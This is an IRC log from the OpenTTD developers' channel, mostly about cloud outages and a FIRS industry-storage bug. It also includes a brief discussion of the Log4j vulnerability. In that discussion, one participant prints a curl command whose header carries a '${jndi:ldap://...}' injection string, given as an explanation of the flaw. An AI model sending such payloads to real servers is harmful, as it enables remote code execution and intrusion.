IRC logs for #openttd on OFTC at 2021-12-15
            
00:01:03 <DorpsGek> [OpenTTD/OpenTTD] michicc updated pull request #9725: Template DoCommand and friends https://git.io/JMoxK
00:02:07 *** geli has quit IRC (Quit: Stay safe!)
01:23:30 *** WormnestAndroid has quit IRC (Remote host closed the connection)
01:23:43 *** WormnestAndroid has joined #openttd
02:19:46 *** roadt__ has joined #openttd
02:26:35 *** roadt_ has quit IRC (Ping timeout: 480 seconds)
02:51:50 *** Wormnest has quit IRC (Quit: Leaving)
03:17:06 *** glx has quit IRC ()
03:20:08 *** D-HUND has joined #openttd
03:23:29 *** debdog has quit IRC (Ping timeout: 480 seconds)
03:54:49 *** D-HUND is now known as debdog
04:38:06 *** Flygon has joined #openttd
07:00:34 *** roadt__ has quit IRC (Read error: Connection timed out)
07:01:01 *** roadt__ has joined #openttd
07:36:07 *** sla_ro|master has joined #openttd
09:29:12 *** WormnestAndroid has quit IRC (Remote host closed the connection)
10:25:12 <Timberwolf> Paid-for work you at least have the fallback that someone else contributed to either the decision or its context.
10:27:33 <Timberwolf> I was having this cognitive dissonance the other day trying to get some very old software working... intense frustration at broken code in people's repos and builds with notes of, "real developers edit makefiles before building, so should you" while also being amazed someone put in the time and effort to build a complete and working emulator for a bunch of 1960s and 1970s mainframes, including weird
10:27:39 <Timberwolf> peripherals and hardware.
12:56:43 *** WormnestAndroid has joined #openttd
13:42:46 *** sla_ro|master has quit IRC ()
14:01:36 <peter1138> I've used goto in some c# source...
14:01:45 <peter1138> Perhaps I need to reevaluate my life.
14:06:46 *** Etua has joined #openttd
14:18:42 *** Etua has quit IRC (Quit: Etua)
14:24:16 *** Etua has joined #openttd
14:29:39 *** nielsm has joined #openttd
14:30:12 *** Etua has quit IRC (Quit: Etua)
14:49:00 *** gelignite has joined #openttd
14:55:10 *** glx has joined #openttd
14:55:10 *** ChanServ sets mode: +v glx
14:56:19 *** colde_ has joined #openttd
14:57:10 *** gregdek_ has joined #openttd
14:57:54 *** mindlesstux_ has joined #openttd
14:58:16 *** colde has quit IRC (Ping timeout: 480 seconds)
14:58:16 *** colde_ is now known as colde
14:59:31 *** gregdek has quit IRC (Ping timeout: 480 seconds)
14:59:31 *** gregdek_ is now known as gregdek
15:00:56 *** mindlesstux has quit IRC (Ping timeout: 480 seconds)
15:00:56 *** mindlesstux_ is now known as mindlesstux
15:01:41 *** ST2 has quit IRC (Ping timeout: 480 seconds)
15:02:43 *** ST2 has joined #openttd
16:04:47 *** andythenorth has joined #openttd
16:04:50 <andythenorth> lol
16:05:05 <andythenorth> AWS, Cloudflare availability issues
16:05:08 <andythenorth> so NPM is down
16:05:13 <andythenorth> amongst other things
16:09:35 <LordAro> ah, that'll be why i couldn't download something a while ago
16:09:47 <TrueBrain> Hi andythenorth, https://log4jmemes.com/, love, TrueBrain
16:10:24 <andythenorth> this one is inaccurate https://dl.airtable.com/.attachments/2f7c668073cee9ddcb71ba2091a0ef2a/ad0d0c80/KDnmlxQ.png
16:10:34 *** Wormnest has joined #openttd
16:10:43 <TrueBrain> And cloudflare? Or cloudfront?
16:10:58 <dwfreed> I wonder if there's log4j in smart cards
16:11:01 * dwfreed ducks
16:11:08 <dwfreed> or blu-ray players
16:11:19 <andythenorth> I have to check my mesh wifi provider
16:11:24 <LordAro> or SIM cards
16:11:36 <andythenorth> does it matter if it's in the SIMs?
16:11:41 <andythenorth> it will be in the telco networks
16:11:57 <andythenorth> we are currently doing full DR planning
16:12:15 <dwfreed> LordAro: arguably SIM cards are just a subclass of smart cards :P
16:13:56 <LordAro> arguably, yes
16:39:01 *** iSoSyS has joined #openttd
16:39:22 *** iSoSyS has quit IRC ()
17:09:13 *** frosch123 has joined #openttd
17:16:27 <frosch123> https://twitter.com/TheASF/status/1400875147163279374
17:17:06 <LordAro> oh no
17:17:35 *** Flygon has quit IRC (Quit: A toaster's basically a soldering iron designed to toast bread)
17:17:39 <frosch123> finally a good joke about *remote* code execution
17:55:10 <andythenorth> GG
18:07:39 <TrueBrain> I wonder how long the firmware update takes :P
18:09:05 <frosch123> esp. when the connection is already fully utilized by coin miners
18:23:47 <frosch123> hmm, i am not fluent enough in java to understand the root cause. is it because java has no warning "format not a string literal"?
18:24:44 <frosch123> and people logging strings directly using "logger.info(foo)", when they should use "logger.info("{}", foo)"?
18:26:01 <LordAro> also that one of those is essentially `eval <result from 3rdparty server>`
18:27:08 <frosch123> well, that's my main issue with the news... everyone talks about "there is a string formatter to execute code", but imho "external messages can contain format codes" is still broken
18:27:37 <frosch123> does no one care if "harmless string substitution" results in mess in the log file?
18:28:25 <frosch123> all the log4j patching feels like hiding/working around/mitigating a bug, instead of fixing it
18:28:29 <LordAro> mm, i'm not sure either
18:30:27 <LordAro> https://logging.apache.org/log4j/2.x/manual/api.html certainly suggests that you can do it without that
18:30:56 <LordAro> unless string parameters are also evaluated? which seems nuts, but so does the ability for your logging framework to make web requests
18:31:22 <frosch123> oof, that example in "substituting parameters"...
18:31:49 <frosch123> it shows both methods
18:32:39 <frosch123> C people learned that the first version is invalid, and added warnings/errors. did java just miss that call?
18:34:25 <frosch123> oh, maybe the docs read like: "info("str" + foo)" is log4j 1.x, and "info("str {}", foo)" is log4j 2.x
18:34:40 <frosch123> though that does not make it any better
18:57:24 <andythenorth> so are we now mining on the moon?
18:58:32 <andythenorth> from what I read the log4j vuln is not a bug, it's firmly a feature, essential for backwards compatibility with the ecosystem
18:58:36 <andythenorth> in ways I didn't understand
18:58:45 <andythenorth> but I suspect LordAro has the appropriate XKCD to hand
19:13:02 <LordAro> 1172 or 972, perhaps?
19:13:05 <LordAro> or 1700
19:14:23 <andythenorth> 1700 is rather good
19:14:38 <andythenorth> I think 1172 is pertinent
19:16:21 <TrueBrain> frosch123: https://www.lunasec.io/docs/blog/log4j-zero-day/ to understand it in technical terms
19:16:40 <TrueBrain> but basically, no, escaping wasn't the issue on a user-level (from what I understand)
19:17:19 <TrueBrain> log.info("Requested Api Version:{}", apiVersion);
19:17:19 <TrueBrain> in a nutshell
19:17:19 <TrueBrain> curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
19:18:58 <TrueBrain> so the first shitty thing is that the jndi thing makes an external call, which of course is bananas on its own
19:19:16 <TrueBrain> the second shitty thing is that if you return a Java class, it is being executed, for "backwards compatible" reasons :P
19:19:34 <TrueBrain> (and that is why it carries a score of 10 (out of 10))
19:21:23 <TrueBrain> andythenorth: no, the xkcd has been replaced by https://dl.airtable.com/.attachments/fc40ade9c20d8620461f8cb358b2467a/8006943c/image2.png
19:22:59 <andythenorth> the most important thing apparently was 'log for jay' or 'log forge'
19:23:11 <andythenorth> this is like PNG all over again
19:24:24 *** sla_ro|master has joined #openttd
19:28:00 <frosch123> TrueBrain: thanks, so format substitution happens multiple times then..
19:28:30 <frosch123> xkcd 1700 is in fact pretty close :)
19:30:16 <andythenorth> like a prediction
19:30:40 <andythenorth> part of our infosec stance is based on 'act as though everything is probably already owned'
19:30:47 <andythenorth> and this year we got to find out why
19:41:31 <frosch123> this year a lot of things failed :) fb, aws, java-everything, my ipv6 connection, ...
19:42:22 *** Wormnest has quit IRC (Ping timeout: 480 seconds)
19:48:01 <andythenorth> FIRS
19:48:19 <andythenorth> 4.4.0 has a bug that wipes out the value of perm register 2 sometimes, for reasons I don't see
19:48:38 <andythenorth> discord player gave me a confirmed repro of the result via screenshot
19:48:43 <andythenorth> but I don't know the trigger
19:49:25 *** WormnestAndroid has quit IRC (Ping timeout: 480 seconds)
19:49:37 <andythenorth> there are no other registers getting obviously zero-ed so I suspect 100% chance it's my code, not openttd
19:50:01 <frosch123> just set a watchpoint :p
19:50:04 <andythenorth> unless sometimes certain callbacks can run closely and out of sequence
19:51:16 <frosch123> what does that mean? are you using the register as a message queue between callbacks?
19:57:36 * andythenorth looks
19:57:47 <andythenorth> I suspect maybe multiple callbacks write to it
20:02:37 <andythenorth> seems not, in 4.4.0 at least
20:02:52 <andythenorth> I have rewritten some of these subsequently, not released
20:04:39 <glx> maybe you need to search for all \2psto in the generated nfo
20:05:41 <frosch123> i would assume if andy uses one write-storage in a pynml template, it results in 1M instances in the nfo :)
20:06:05 <glx> yeah but with different values
20:06:37 <andythenorth> the behaviour apparently arises randomly
20:06:41 <glx> and as I understand the report on discord it doesn't happen for all industries
20:06:41 <andythenorth> with no obvious repro
20:07:12 <glx> hand placed ones don't trigger the issue, only random placed ones
20:07:51 <andythenorth> I've never seen it in any test game either
20:08:23 <andythenorth> n
20:08:32 <andythenorth> lol mistype
20:10:17 *** Wolf01 has joined #openttd
20:10:27 *** Wormnest has joined #openttd
20:24:21 <glx> I found 17 STORE_PERM, but I don't understand their meaning :)
20:26:13 <andythenorth> I only see storage 2 written once per industry
20:26:32 *** nielsm has quit IRC (Ping timeout: 480 seconds)
20:48:35 *** Eddi|zuHause is now known as Eddi|zuHause2
21:16:51 *** frosch123 has quit IRC (Quit: be yourself, except: if you have the opportunity to be a unicorn, then be a unicorn)
21:27:46 *** andythenorth has quit IRC (Quit: andythenorth)
21:29:30 *** Eddi|zuHause2 is now known as Eddi|zuHause
21:34:17 *** andythenorth has joined #openttd
21:57:04 *** WormnestAndroid has joined #openttd
21:59:03 *** andythenorth has quit IRC (Quit: andythenorth)
22:15:45 *** _aD has joined #openttd
22:15:58 *** Wormnest has quit IRC (Ping timeout: 480 seconds)
22:16:30 *** WormnestAndroid has quit IRC (Ping timeout: 480 seconds)
22:17:56 *** Wolf01 has quit IRC (Quit: Once again the world is quick to bury me.)
22:18:48 *** WormnestAndroid has joined #openttd
22:32:53 *** gelignite has quit IRC (Quit: Stay safe!)
22:40:36 *** Wormnest has joined #openttd
23:06:30 *** sla_ro|master has quit IRC ()